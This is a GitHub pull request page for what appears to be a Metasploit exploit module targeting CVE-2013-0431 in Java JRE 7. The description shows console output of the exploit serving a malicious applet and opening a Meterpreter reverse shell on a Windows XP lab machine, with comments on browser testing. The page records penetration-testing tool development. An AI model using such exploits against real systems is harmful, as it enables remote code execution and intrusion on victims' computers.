Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Added first version of cve-2013-0431 #1509

Merged
merged 6 commits into from Feb 25, 2013
Merged

Added first version of cve-2013-0431 #1509

merged 6 commits into from Feb 25, 2013

Conversation

jvazquez-r7
Copy link
Contributor

First versions, as found in the wild and deobfuscated by https://twitter.com/SecObscurity

msf  exploit(java_jre17_jmxbean_2) > rexploit
[*] Reloading module...
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.128:4444 
[*] Using URL: http://0.0.0.0:8080/a431rgTUKn
[*]  Local IP: http://192.168.1.128:8080/a431rgTUKn
[*] Server started.
msf  exploit(java_jre17_jmxbean_2) > [*] 192.168.1.157    java_jre17_jmxbean_2 - handling request for /a431rgTUKn
[*] 192.168.1.157    java_jre17_jmxbean_2 - handling request for /a431rgTUKn/
[*] 192.168.1.157    java_jre17_jmxbean_2 - handling request for /a431rgTUKn/drbGMgHE.jar
[*] 192.168.1.157    java_jre17_jmxbean_2 - handling request for /a431rgTUKn/drbGMgHE.jar
[*] 192.168.1.157    java_jre17_jmxbean_2 - handling request for /a431rgTUKn/java/lang/ClassBeanInfo.class
[*] 192.168.1.157    java_jre17_jmxbean_2 - handling request for /a431rgTUKn/
[*] 192.168.1.157    java_jre17_jmxbean_2 - handling request for /a431rgTUKn/java/lang/ObjectBeanInfo.class
[*] 192.168.1.157    java_jre17_jmxbean_2 - handling request for /a431rgTUKn/
[*] 192.168.1.157    java_jre17_jmxbean_2 - handling request for /a431rgTUKn/java/lang/ObjectCustomizer.class
[*] 192.168.1.157    java_jre17_jmxbean_2 - handling request for /a431rgTUKn/
[*] 192.168.1.157    java_jre17_jmxbean_2 - handling request for /a431rgTUKn/java/lang/ClassCustomizer.class
[*] 192.168.1.157    java_jre17_jmxbean_2 - handling request for /a431rgTUKn/
[*] Sending stage (30216 bytes) to 192.168.1.157
[*] Meterpreter session 1 opened (192.168.1.128:4444 -> 192.168.1.157:1249) at 2013-02-20 16:34:58 +0100

msf  exploit(java_jre17_jmxbean_2) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer    : juan-c0de875735
OS          : Windows XP 5.1 (x86)
Meterpreter : java/java
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.1.157 - Meterpreter session 1 closed.  Reason: User exit

@jvazquez-r7
Copy link
Contributor Author

jvazquez-r7@1913d60 allows to use the applet tag when it's an internet explorer browser, and the embed tag in other cases (netscape browser mainly). The main reason is which the applet tag isn't working on google chrome.

@jvazquez-r7
Copy link
Contributor Author

Tested successfully on IE8, FF 19 and chrome 24.0.1312.57 m

@todb-r7 todb-r7 merged commit f04df63 into rapid7:master Feb 25, 2013
@coveralls
Copy link

Coverage Status

Changes Unknown when pulling f04df63 on jvazquez-r7:java_jre17_jmxbean_2 into * on rapid7:master*.

@jvazquez-r7 jvazquez-r7 deleted the java_jre17_jmxbean_2 branch November 18, 2014 15:50
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
3 participants
@jvazquez-r7 @coveralls @todb-r7